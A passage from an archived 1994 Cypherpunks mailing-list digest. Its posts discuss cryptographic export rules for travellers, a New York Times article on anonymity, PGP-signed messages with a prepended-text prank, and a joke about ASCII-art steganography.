since no one actually knows this, no mechanism exists to deal with it. While (fortunately) everyone I dealt with was sympathetic, no one in the government who I spoke with was actually able to help me follow the rules. I was able to leave and come back only because everyone involved eventually recognized that my telephone was pretty harmless, that my intentions were good, and that the best thing to do was be flexible. Had anyone taken a hard line and tried to enforce the letter of the law, I simply wouldn't have been able to take the thing with me, even with my license. Had I simply taken it with me and come back instead of calling attention to myself by trying to follow the rules, no one would have noticed. DRAFT - PLEASE DO NOT QUOTE OR REDISTRIBUTE From jamesd at netcom.com Sat Dec 31 13:54:52 1994 From: jamesd at netcom.com (James A. Donald) Date: Sat, 31 Dec 94 13:54:52 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: <9412312132.AA11647@merckx.info.att.com> Message-ID: On Sat, 31 Dec 1994, Matt Blaze wrote: > My conclusion from all this is that it just isn't possible for an > individual traveler to follow the rules. [...] > Had I simply taken it with me and come back instead of > calling attention to myself by trying to follow the rules, no one would > have noticed. According to my former boss, Kevin Welch, the same is true not only for individual travellers, but for small businesses. I can see from the letter that you sent before you tried this experiment, that this is the outcome that you expected. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jya at pipeline.com Sat Dec 31 13:56:08 1994 From: jya at pipeline.com (John Young) Date: Sat, 31 Dec 94 13:56:08 PST Subject: remarkably bad media Message-ID: <199412312156.QAA09707@pipe2.pipeline.com> Responding to msg by perry at imsi.com (Perry E. Metzger) on Sat, 31 Dec 12:39 PM Perry makes an astute critique about the Peter Lewis article today on anonymity. I hope that he or someone takes the time to write The Times with polite corrections or a cataclysmic attack. I would note that the two law professors quoted are active on mail list Cyberia-L, where many of the cypherpunks issues are debated from a legal perspective. Peter Lewis is a subscriber to that list. Peter Lewis wrote yesterday about the LaMacchia case dismissal. The article was reprinted verbatim today. It too focussed on the need for legislation. (Todd posted Reuter's version.) Is it any wonder that lawyers are quoted when enhanced law and order are immanent? Mike Godwin, of EFF and also a Cyberia-L subscriber, takes a dissenting view from that presented by those quoted by Lewis. Or so I would judge from his posts on the LaMacchia case. My one-cent's worth to the anonymity topic is that The NYT may be drum-beating for legislation to regulate anonymity -- a characteristicly paternalistic role of the self-important power-brokering running-dog mad-dog yellow-dog hyenia-slobbering anarchy-hating media. Oops, sorry for that anonymous slip. Back to totally disinterested objectivity, eye-of-god, slug-under-rock-safety. Say, if anyone wants the Lewis article on LaMacchia, send blank message with subject: LAM_not From raph at netcom.com Sat Dec 31 15:11:47 1994 From: raph at netcom.com (Raph Levien) Date: Sat, 31 Dec 94 15:11:47 PST Subject: remarkably bad media In-Reply-To: <9412311739.AA09311@webster.imsi.com> Message-ID: <199412312311.PAA10378@netcom14.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- This is really the first line of this message. Ignore the line below -- it was added by mistake by my autosigning scripts. Also, I was completely thrilled by the Peter Lewis article. Now that I've thought about it some more, the Microsoft hoax _was_ a problem with anonymity. Please just disregard the rest of this post. Thanks. -- Raph This is the first line of this message. I agree with Perry that the article has some serious problems. Very little of the actual stuff he talked about has anything to do with anonymity at all, especially with anonymous remailers. I was interviewed but not quoted. I mostly talked about the remailers, their political situation (the fact that the average half-life of a remailer seems to be about six months), and what my role is in trying to make the whole mess useable. When I talked to him on the phone, Peter seemed pretty clear about the distinction between spoofing someone else's identity and being anonymous. However, I don't think this distiction made it into print. The sidebar was particularly problematical. It presented digital signatures as a relief for the problems posed by anonymity. Well, of course I think digital signatures are a wonderful idea (which is why I've signed this post), but it certainly won't protect anybody against being exposed to disturbing ideas that are disseminated anonymously. Thus, I would consider the sidebar to be misleading. I first saw the Microsoft spoof posted to rec.humor.funny. I don't recall it being anonymous, and even if it was, it was clearly labled as a joke. Any problems it caused are due to human gullibility. I found it to be a great demonstration of how effective the AP inverted-pyramid style is in conveying misinformation. I can sympathize with Peter a bit, having just written an article for Wired magazine (Feb '94, pp. 68-69). They used about half of the text I originally wrote. My hard-headed skeptical review of stochastic screening techniques was transformed into Wired's trademark gee-whiz boosterism. As the NYT article appeared, I'm just as happy that I wasn't quoted. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwXjPf4BfQiT0bDNAQHN6wP7BqDsLWaSxGu4wet8OaJ0duPMwChXpzAA ryjQOTFsqkz5tWMGBcE5iz+4wAj1lZI2NcX2Y6QF+OPBBMFItmFoIyr1VLYCMUaT nfaTmQBoLPOvgv9nNILuYNd2quBQzQR7yODqUGciBPQk281ao/hgoJjCxg79mbVd SoMUGjNgcM4= =ywCF -----END PGP SIGNATURE----- PGP key available by fingering raph at netcom.com From CCGARY at MIZZOU1.missouri.edu Sat Dec 31 18:00:44 1994 From: CCGARY at MIZZOU1.missouri.edu (Gary Jeffers) Date: Sat, 31 Dec 94 18:00:44 PST Subject: Fake signature - cover charge Message-ID: <199501010206.VAA23118@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Well, is this file going to be posted on Cypherpunks with a fake signature, or will it just annoy L. Todd Masco? On my last post to Cypherpunks, I legit. signed it with my very own military grade PGP signature & encluded armored public key. Eric Hughes: It looks like this mandatory signing thing just isn't keeping out the Riff-Raft! How about a cover charge instead? PUSH EM BACK! PUSH EM BACK! WWWAAAYYY BBBAAACCCK! BBBEEEAAATTTT STATE! Gary Jeffers - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwYOASoZzwIn1bdtAQFIeAGAmD7jANYl7GTXU5qkeW271Fs5jYJUdnDZ elG+SsJvG1RFs7CM82DlvAaMxVT62vHa =Ue1R -----END PGP SIGNATURE----- From crawford at scruznet.com Sat Dec 31 18:34:27 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Sat, 31 Dec 94 18:34:27 PST Subject: From Me to You for the Coming Year....*giggle* Message-ID: <199501010234.SAA04913@scruz.net> Carol Anne Braddock sez... >'##::::'##::::'###::::'########::'########::'##:::'##: ... etc. An interesting form of steganography. Is there a prize for determining the secret message? And Happy New Year to you, too! Cheers, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.